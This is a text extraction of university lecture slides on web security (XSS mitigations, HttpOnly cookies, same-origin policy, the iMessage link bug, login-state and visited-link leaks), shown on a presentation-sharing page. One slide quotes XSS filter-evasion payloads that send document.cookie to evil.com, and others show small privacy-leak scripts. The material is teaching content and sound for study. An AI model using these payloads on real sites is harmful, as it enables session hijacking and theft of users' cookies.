web security part 2
play

web security (part 2) 1 Changelog Corrections made in this version - PowerPoint PPT Presentation

Jun 27, 2023 •224 likes •998 views

web security (part 2) 1 Changelog Corrections made in this version not in fjrst posting: 25 April 2017: removed text about reading contents without sending cokoies from operations not requiring same origin slide. (This can be done with

  1. web security (part 2) 1

  2. Changelog Corrections made in this version not in fjrst posting: 25 April 2017: removed text about reading contents without sending cokoies from “operations not requiring same origin” slide. (This can be done with permission or by sending a request from the webserver itself, but not in general.) 1

  3. last time: web security stateless requests (single URL) added cookies to tie requests together “session ID” — identifjes, e.g., login client versus server trust XSS — command injection in HTML power of scripting — get cookies doesn’t need to be stored — embed in other web page extract info to external site — e.g., fetch image 2 don’t trust the attacker’s browser

  4. evil client/innocent website attacker’s web browser vulnerable website command injection? email= "; dangerousCommand improperly trusted input? price= $0 3

  5. evil website/innoncent website victim user’s web browser attacker website victim website get some web page do something with victim website request chosen by attacker page with javascript chosen by attacker? injected command: “send secret cookie to attacker”? results of action chosen by attacker? secret values from victim website 4

  6. XSS demo 5

  7. XSS mitigations host dangerous stufg on difgerent domain has difgerent cookies Content-Security-Policy server says “browser, don’t run scripts here” HttpOnly cookies server says “browser, don’t share this with code on the page” fjlter/escape inputs (same as normal command injection) 6

  8. XSS mitigations host dangerous stufg on difgerent domain has difgerent cookies Content-Security-Policy server says “browser, don’t run scripts here” HttpOnly cookies server says “browser, don’t share this with code on the page” fjlter/escape inputs (same as normal command injection) 6

  9. HTML fjltering/escaping nits it’s easy to mess up HTML fjltering or escaping (especially if trying to allow “safe HTML”) browsers have features you don’t know about can ‘only’ set image URL? < img src="javascript:(new Image()).src= 'http://evil.com/' + document.cookie"> disallow the word ‘script’? < img src=x onerror="(new Image()).src= 'http://evil.com/' + document.cookie"> via https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet 7

  10. XSS mitigations host dangerous stufg on difgerent domain has difgerent cookies Content-Security-Policy server says “browser, don’t run scripts here” HttpOnly cookies server says “browser, don’t share this with code on the page” fjlter/escape inputs (same as normal command injection) 8

  11. HTTP-only cookies Set-Cookie: SessionID=123456789; HttpOnly “only send cookie in HTTP” cookie is not available to JS eliminates obvious way of exploiting XSS problem: JS can read webpage contents 9

  12. HTTP-only cookies Set-Cookie: SessionID=123456789; HttpOnly “only send cookie in HTTP” cookie is not available to JS eliminates obvious way of exploiting XSS 9 problem: JS can read webpage contents

  13. web pages in webpages: demo 10

  14. web pages in web pages (1) < iframe id="localFrame" src="./localsecret.html" onload="readLocalSecret()"></ iframe > < script > function readLocalSecret() { alert(document.getElementById('localFrame'). contentDocument.innerHTML); } </ script > can also extract specifjc parts of page same idea works for sending it to remote server 11 displays localsecret.html’s contents in an alert box

  15. web pages in web pages (2) < iframe id="remoteFrame" src="https://collab.virginia.edu/..." onload="readRemoteSecret()></ iframe > < script > function doIt() { alert(document.getElementById('remoteFrame'). contentDocument.innerHTML); } </ script > will this work? 12

  16. what happened? “TypeError: document.getElementById(...).contentDocument is null” web browser denied access Same Origin Policy 13

  17. browser protection websites want to load content dynamically Google docs — send what others are typing webmail clients autoloading new emails, etc. … but shouldn’t be able to do so from any other website e.g. read grades of Collab if I’m logged in 14

  18. same-origin policy two pages from same origin : scripts can do anything idea: difgerent websites can’t interfere with each other facebook can’t learn what you do on Google — unless Google allows it enforced by browser 15 two pages from difgerent origins : almost no information

  19. origins origin: part of URL up to server name: https://example.com/foo/bar http://localhost/foo/bar http://localhost:8000/foo/bar https://www.example.com/foo/bar http://example.com/foo/bar https://other.com/foo/bar file:///home/cr4bd 16

  20. cookie fjelds cookie data: whatever server wants; typically session ID same problems as hidden fjelds usually tied to database on server supposed to be kept secret by logged-in user domain : to what servers should browser send the cookie facebook.com, etc. path : to what URLs on a server should browser send the cookie /foo — server.com/foo, server.com/foo/bar, etc. expires : when the browser should forget the cookie (and more) 17 facebook.com — login.facebook.com, www.facebook.com,

  21. origins and shared servers very hard to safely share a domain name can never let attacker write scripts on same domain even if cookies don’t matter similar issues with plugins (e.g. Flash) 18 can share server — one server can host multiple names

  22. iMessage bug iMessage (Apple IM client): embedded browser to display messages a common (easy?) way to write user interfaces message links could include javascript same-origin policy not enforced https://www.bishopfox.com/blog/2016/04/if-you-cant-break-crypto-break-the-client-recovery-of-plaintext-imessage-data/ 19 bug: click on malicious link, send message logs to attacker

  23. iMessage bug iMessage (Apple IM client): embedded browser to display messages a common (easy?) way to write user interfaces message links could include javascript same-origin policy not enforced https://www.bishopfox.com/blog/2016/04/if-you-cant-break-crypto-break-the-client-recovery-of-plaintext-imessage-data/ 20 bug: click on malicious link, send message logs to attacker

  24. JavaScript URL javascript:some java script code is a kind of URL runs JavaScript when clicked (permissions of current web page) iMessages allowed ANYTHING :// ANYTHING as a link https://www.google.com/ invalidnamethatdoesnotdoanything://otherStuff JS can request file:///Users/somename/Library/Messages/chat.db no same origin policy just for the UI should have prohibited this 21 javascript://%0a JavaScriptCodeHere (%0a = newline)

  25. operations requiring same origin accessing webpage you loaded in iframe, pop-up window, etc. accessing webpage loading you in iframe, pop-up window, etc. sending certain kinds of requests most notably XMLHTTPRequest — “AJAX” 22

  26. operations not requiring same origin loading images, stylesheets (CSS), video, audio linking to websites loading scripts but not getting syntax errors accessing with “permission” of other website submitting forms to other webpages requesting/displaying other webpages (but not reading contents) 23

  27. operations not requiring same origin loading images, stylesheets (CSS), video, audio linking to websites loading scripts but not getting syntax errors accessing with “permission” of other website submitting forms to other webpages requesting/displaying other webpages (but not reading contents) 24

  28. logged into facebook? (1) https://www.facebook.com/login.php?next= URL otherwise redirects to URL 25 login page if you are not logged in

  29. logged into facebook? (2) https://www.facebook.com/favicon.ico is an image load via conditional redirect: < img src="http://www.facebook.com/login.php?next= https%3A//www.facebook.com/favicon.ico" onload="doLoggedInStuff()" onerror="doNotLoggedInStuff()"> JavaScript can check if image loaded correctly also can check image size via https://robinlinus.github.io/socialmedia-leak/ 26 ֒ →

  30. operations not requiring same origin loading images, stylesheets (CSS), video, audio linking to websites loading scripts but not getting syntax errors accessing with “permission” of other website submitting forms to other webpages requesting/displaying other webpages (but not reading contents) 27

  31. old problem: visited links browsers can display visited versus unvisited links difgerent: javascript can query the “computed style” of a link < style >:visited{color:red}</ style > < a id="lnk" href="https://facebook.com/secretgroup/">link</ a > < script > var link = document.getElementById("lnk"); if (window.getComputedStyle(link, null ).getProperty('color') == ...) { ... } </ script > 28

  32. visited link: fjx most browsers have fjxed visited link “leaks” — not trivial getComputedStyle lies about visited links as if unvisited e.g. difgerent font size — could detect from sizes of other things still tricks involving page appearance 29 many types of formatting disallowed for visited links probably incomplete solution?

Download Presentation
Download Policy: The content available on the website is offered to you 'AS IS' for your personal information and use only. It cannot be commercialized, licensed, or distributed on other websites without prior consent from the author. To download a presentation, simply click this link. If you encounter any difficulties during the download process, it's possible that the publisher has removed the file from their server.

Recommend

Com puter Security Part One Security as a subject Security is an old problem in the

Com puter Security Part One Security as a subject Security is an old problem in the

Com puter Security Part One Security as a subject Security is an old problem in the computing world, and are parallel to even older problems outside computing Required level of security is always related to what you protect

237 views • 23 slides
Dawn Song dawnsong@cs.berkeley.edu 1 Part II OS &amp; Web Security OS Security Web

Dawn Song dawnsong@cs.berkeley.edu 1 Part II OS &amp; Web Security OS Security Web

Safe Extension Dawn Song dawnsong@cs.berkeley.edu 1 Part II OS &amp; Web Security OS Security Web Security More esoteric topics Click fraud, etc. Reputation systems &amp; trust metrics Few papers, but local experts

420 views • 5 slides
The Methodology of Provable Security Marc Joye Thomson Security Labs marc.joye@thomson.net

The Methodology of Provable Security Marc Joye Thomson Security Labs marc.joye@thomson.net

The Methodology of Provable Security Marc Joye Thomson Security Labs marc.joye@thomson.net DIWALL Seminar March 20, 2008 Contents Part I Introduction Part II Signature Schemes Part III Encryption Schemes Part IV Conclusion Part I

463 views • 24 slides
Heimdal - The Cyberthreat Security Suite - We protect what others cant About Heimdal Security

Heimdal - The Cyberthreat Security Suite - We protect what others cant About Heimdal Security

Heimdal - The Cyberthreat Security Suite - We protect what others cant About Heimdal Security Part of the best in the Developed by world Driven by the market Cyber Threat space champions experts Heimdal Security is part of Gartners

322 views • 17 slides
Heimdal - The Cyberthreat Security Suite - We protect what others cant About Heimdal Security

Heimdal - The Cyberthreat Security Suite - We protect what others cant About Heimdal Security

Heimdal - The Cyberthreat Security Suite - We protect what others cant About Heimdal Security Part of the best in the Devised by world Driven by experienced Cyber Threat space champions experts Heimdal Security is part of the best in The

712 views • 43 slides
Announcements Schedule Web security part 1 today, part

Announcements Schedule Web security part 1 today, part

Announcements Schedule Web security part 1 today, part 2 in two weeks Next week: guest lecture by David Parter on Oct 15

749 views • 36 slides
Com puter Security - Part Three Last tim e Multilevel and multilateral security Threats

Com puter Security - Part Three Last tim e Multilevel and multilateral security Threats

Com puter Security - Part Three Last tim e Multilevel and multilateral security Threats Security policies Confidentiality Policies Policy The Bell-LaPadula Model Specification Integrity Policies The Biba

698 views • 49 slides
Software and Web Security deel 2 deel 2 sws1 Software and Web Security - 1 &amp; 2 y Software

Software and Web Security deel 2 deel 2 sws1 Software and Web Security - 1 &amp; 2 y Software

1 Software and Web Security deel 2 deel 2 sws1 Software and Web Security - 1 &amp; 2 y Software is the main source of security vulnerabilities esp in systems accessible via a network i t ibl i t k part 1 part 1 security problems

672 views • 65 slides
- Systems Security: Part 1 - Prof. Dr. Michael Backes Director, CISPA Center for IT Security,

- Systems Security: Part 1 - Prof. Dr. Michael Backes Director, CISPA Center for IT Security,

Introduction to Cybersecurity - Systems Security: Part 1 - Prof. Dr. Michael Backes Director, CISPA Center for IT Security, Privacy, and Accountability Chair for IT-security &amp; Cryptography General Information Correct formatting

1.05k views • 75 slides
Summary Security: Applications &amp; Aspects Part I Cryptographic Features Introduction

Summary Security: Applications &amp; Aspects Part I Cryptographic Features Introduction

Summary Security: Applications &amp; Aspects Part I Cryptographic Features Introduction Software vs Hardware Support Hardware Acceleration Solutions Processor Extensions for Security Basic Cyphering Part II Symmetric vs Asymmetric

1.14k views • 21 slides
Com puter Security Part Tw o Previously Introduction Threat analysis Threats

Com puter Security Part Tw o Previously Introduction Threat analysis Threats

Com puter Security Part Tw o Previously Introduction Threat analysis Threats Policy Specification Design Implementation Operation and Maintenance Now Multilateral and Multilevel security Security policies

355 views • 24 slides
Part I: OUTER SPACE SECURITY and An Update on Outer Space Security A BRIEF

Part I: OUTER SPACE SECURITY and An Update on Outer Space Security A BRIEF

23-May-18 AN INTRODUCTION TO Part I: OUTER SPACE SECURITY and An Update on Outer Space Security A BRIEF HISTORY OF THE PREVENTION OF AN ARMS RACE IN OUTER SPACE Two presentations to inform CD Subsidiary Body 3 discussion 23

672 views • 8 slides
Web Security, Part 2 CS 161 - Computer Security Profs. Vern Paxson &amp; David Wagner TAs: John

Web Security, Part 2 CS 161 - Computer Security Profs. Vern Paxson &amp; David Wagner TAs: John

Web Security, Part 2 CS 161 - Computer Security Profs. Vern Paxson &amp; David Wagner TAs: John Bethencourt, Erika Chin, Matthew Finifter, Cynthia Sturton, Joel Weinberger http://inst.eecs.berkeley.edu/~cs161/ Feb 3, 2010 With thanks for some

295 views • 28 slides
Web Security, Part 1 CS 161 - Computer Security Profs. Vern Paxson &amp; David Wagner TAs: John

Web Security, Part 1 CS 161 - Computer Security Profs. Vern Paxson &amp; David Wagner TAs: John

Web Security, Part 1 CS 161 - Computer Security Profs. Vern Paxson &amp; David Wagner TAs: John Bethencourt, Erika Chin, Matthew Finifter, Cynthia Sturton, Joel Weinberger http://inst.eecs.berkeley.edu/~cs161/ Feb 1, 2010 Web Server Threats

274 views • 16 slides
ORC Chapter 420-3-26-.15 and 10 CFR Part 37 Changes to Physical Security Protection Requirements

ORC Chapter 420-3-26-.15 and 10 CFR Part 37 Changes to Physical Security Protection Requirements

ORC Chapter 420-3-26-.15 and 10 CFR Part 37 Changes to Physical Security Protection Requirements A Brief History of Security Measures - 11/14/05 - EA-05-090: NRC Order Imposing Increased Controls (IC). In Alabama the Orders were implemented by

498 views • 27 slides
Part 5 Usability and Security Cognitive Errors, Usability vs. Security, Groupware Antonio Cerone

Part 5 Usability and Security Cognitive Errors, Usability vs. Security, Groupware Antonio Cerone

Phd course on Formal modelling and analysis of interactive systems Part 5 Usability and Security Cognitive Errors, Usability vs. Security, Groupware Antonio Cerone United Nations University International Institute for Software Technology

1.76k views • 109 slides
: ODF on the web FOSDEM 2014 Jos van den Oever Overview What is it? Demo Viewer.js

: ODF on the web FOSDEM 2014 Jos van den Oever Overview What is it? Demo Viewer.js

: ODF on the web FOSDEM 2014 Jos van den Oever Overview What is it? Demo Viewer.js ODF editor Collaborative ODF editor How does it work? ODF in the browser Collaborative editing How to use it? : ODF on the web

576 views • 15 slides
Charlie Garrod Bogdan Vasilescu School of Computer Science 17-214 1 So3ware is everywhere 17-214

Charlie Garrod Bogdan Vasilescu School of Computer Science 17-214 1 So3ware is everywhere 17-214

Principles of So3ware Construc9on: Objects, Design, and Concurrency Part 1: Introduc9on Course overview and introduc9on to so3ware design Charlie Garrod Bogdan Vasilescu School of Computer Science 17-214 1 So3ware is everywhere 17-214 2

1.31k views • 95 slides
Web Services 15-213: Introduc0on to Computer Systems 21 st

Web Services 15-213: Introduc0on to Computer Systems 21 st

Carnegie Mellon Web Services 15-213: Introduc0on to Computer Systems 21 st Lecture, Nov. 4, 2010 Instructors: Randy Bryant and Dave OHallaron 1 Carnegie Mellon

423 views • 40 slides
Jum ping around in Blaise I S Maurice Martens m.g.j.martens@uvt.nl CentERdata 10/ 17/ 2013 Jum

Jum ping around in Blaise I S Maurice Martens m.g.j.martens@uvt.nl CentERdata 10/ 17/ 2013 Jum

Jum ping around in Blaise I S Maurice Martens m.g.j.martens@uvt.nl CentERdata 10/ 17/ 2013 Jum ping around in Blaise I S Online life history calendar Technical explanation Problems and solutions Spin-offs 3 10/ 17/ 2013 Online life

763 views • 17 slides
Telematics 2 &amp; Performance Evaluation Chapter 7 Complex Queuing System (Acknowledgement:

Telematics 2 &amp; Performance Evaluation Chapter 7 Complex Queuing System (Acknowledgement:

Telematics 2 &amp; Performance Evaluation Chapter 7 Complex Queuing System (Acknowledgement: These slides have been prepared by Prof. Dr. Holger Karl) Telematics 2 / Performance Evaluation (WS 17/18): 07 Complex Queuing System 1 Goal of

823 views • 26 slides
Leaving legacy behind Reducing carbon footprint of network services with MirageOS unikernels

Leaving legacy behind Reducing carbon footprint of network services with MirageOS unikernels

Leaving legacy behind Reducing carbon footprint of network services with MirageOS unikernels Hannes Mehnert, https://hannes.nqsb.io 36c3, 27th December 2019, Leipzig 1 / 37 Stack Application Binary Con fi guration Files Programming language

689 views • 37 slides
Smart Software License Manager Gabrile Saucier Design and Reuse IP SoC Santa Clara 2018

Smart Software License Manager Gabrile Saucier Design and Reuse IP SoC Santa Clara 2018

Smart Software License Manager Gabrile Saucier Design and Reuse IP SoC Santa Clara 2018 Why Most enterprises are not aware of their sofware requirements They may spend money on softaae licenses that aae no longea in use

704 views • 21 slides
HTML Basics CS 115 Computing for the Socio-Techno Web Instructor: Brian Brubach HTML

HTML Basics CS 115 Computing for the Socio-Techno Web Instructor: Brian Brubach HTML

HTML Basics CS 115 Computing for the Socio-Techno Web Instructor: Brian Brubach HTML Hypertext Markup Language (HTML) Hypertext Electronic text with hyperlink references Markup Like a print editor marking a page with format

389 views • 17 slides

More recommend